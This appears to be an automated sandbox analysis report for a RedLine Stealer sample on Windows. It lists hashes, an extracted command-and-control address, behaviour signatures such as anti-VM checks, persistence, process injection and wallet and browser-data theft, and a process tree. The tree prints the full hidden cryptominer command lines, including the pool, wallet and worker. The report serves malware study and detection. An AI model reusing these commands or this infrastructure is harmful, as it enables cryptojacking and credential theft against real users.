Analysis
-
max time kernel
123s -
max time network
146s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
29-01-2022 16:31
Static task
static1
Behavioral task
behavioral1
Sample
04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
Resource
win10-en-20211208
General
-
Target
04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe
-
Size
48KB
-
MD5
6cacd4748ecedd5c5242ef62a941ecbb
-
SHA1
1abc42914153674634cc58674c8d4314fbe22188
-
SHA256
04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd
-
SHA512
a796b796f8b1acb1494e86fda8ac6fcfe6294011cc00b978459e7f3b76006733a4dc6df6b661660413d979d7e72c3f6c0d43e587ec08e718d49a349bc68596ea
Malware Config
Extracted
redline
2142468762
45.9.20.40:50162
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1300-137-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 668 created 1424 668 WerFault.exe RegHost.exe -
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
a.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exepid process 1872 a.exe 64 RegHost.exe 1648 RegHost.exe 832 RegHost.exe 644 RegHost.exe 2516 RegHost.exe 1964 RegHost.exe 1884 RegHost.exe 2392 RegHost.exe 1424 RegHost.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
a.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RegHost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RegHost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a.exe themida C:\Users\Admin\AppData\Local\Temp\a.exe themida behavioral1/memory/1872-152-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp themida behavioral1/memory/1872-153-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp themida behavioral1/memory/1872-154-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/64-161-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/64-162-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/64-163-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1648-169-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1648-170-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1648-171-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/832-177-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/832-178-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/832-179-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/644-185-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/644-186-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/644-187-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/2516-193-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/2516-194-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/2516-195-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1964-201-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1964-202-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1964-203-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1884-209-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1884-210-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1884-211-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/2392-217-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/2392-218-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/2392-219-0x00007FF702120000-0x00007FF702508000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe themida behavioral1/memory/1424-225-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1424-226-0x00007FF702120000-0x00007FF702508000-memory.dmp themida behavioral1/memory/1424-227-0x00007FF702120000-0x00007FF702508000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
a.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
RegHost.exeRegHost.exeRegHost.exeRegHost.exea.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegHost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
Processes:
bfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exebfsvc.exepid process 2956 bfsvc.exe 2956 bfsvc.exe 3936 bfsvc.exe 3936 bfsvc.exe 3104 bfsvc.exe 3104 bfsvc.exe 1288 bfsvc.exe 1288 bfsvc.exe 3480 bfsvc.exe 3480 bfsvc.exe 2264 bfsvc.exe 2264 bfsvc.exe 2540 bfsvc.exe 2540 bfsvc.exe 3704 bfsvc.exe 3704 bfsvc.exe 3536 bfsvc.exe 3536 bfsvc.exe -
Suspicious use of SetThreadContext 19 IoCs
Processes:
04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exea.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription pid process target process PID 3484 set thread context of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 1872 set thread context of 2956 1872 a.exe bfsvc.exe PID 1872 set thread context of 3280 1872 a.exe explorer.exe PID 64 set thread context of 3936 64 RegHost.exe bfsvc.exe PID 64 set thread context of 3192 64 RegHost.exe explorer.exe PID 1648 set thread context of 3104 1648 RegHost.exe bfsvc.exe PID 1648 set thread context of 2580 1648 RegHost.exe explorer.exe PID 832 set thread context of 1288 832 RegHost.exe bfsvc.exe PID 832 set thread context of 1560 832 RegHost.exe explorer.exe PID 644 set thread context of 3480 644 RegHost.exe bfsvc.exe PID 644 set thread context of 3484 644 RegHost.exe explorer.exe PID 2516 set thread context of 2264 2516 RegHost.exe bfsvc.exe PID 2516 set thread context of 980 2516 RegHost.exe explorer.exe PID 1964 set thread context of 2540 1964 RegHost.exe bfsvc.exe PID 1964 set thread context of 3620 1964 RegHost.exe explorer.exe PID 1884 set thread context of 3704 1884 RegHost.exe bfsvc.exe PID 1884 set thread context of 3136 1884 RegHost.exe explorer.exe PID 2392 set thread context of 3536 2392 RegHost.exe bfsvc.exe PID 2392 set thread context of 2908 2392 RegHost.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 668 1424 WerFault.exe RegHost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exeRegAsm.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 2620 powershell.exe 2620 powershell.exe 2620 powershell.exe 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe 1300 RegAsm.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3280 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 3192 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 1560 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe 3484 explorer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exe04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exeRegAsm.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe Token: SeDebugPrivilege 1300 RegAsm.exe Token: SeDebugPrivilege 668 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exeRegAsm.exea.exeexplorer.exeRegHost.exedescription pid process target process PID 3484 wrote to memory of 2620 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe powershell.exe PID 3484 wrote to memory of 2620 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe powershell.exe PID 3484 wrote to memory of 2620 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe powershell.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 3484 wrote to memory of 1300 3484 04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe RegAsm.exe PID 1300 wrote to memory of 1872 1300 RegAsm.exe a.exe PID 1300 wrote to memory of 1872 1300 RegAsm.exe a.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 2956 1872 a.exe bfsvc.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 1872 wrote to memory of 3280 1872 a.exe explorer.exe PID 3280 wrote to memory of 64 3280 explorer.exe RegHost.exe PID 3280 wrote to memory of 64 3280 explorer.exe RegHost.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe PID 64 wrote to memory of 3936 64 RegHost.exe bfsvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe"C:\Users\Admin\AppData\Local\Temp\04a8ea3cbcbc20c6e9a5e8df1e3adac62f7731aeace1c0681aa9fa3b53a85cdd.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc WwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADIAMAAwADAAMAApAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a.exe"C:\Users\Admin\AppData\Local\Temp\a.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +5004⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +5006⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +5008⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50010⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50012⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"12⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50014⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"14⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50016⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"16⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50018⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"18⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"19⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +50020⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"20⤵
-
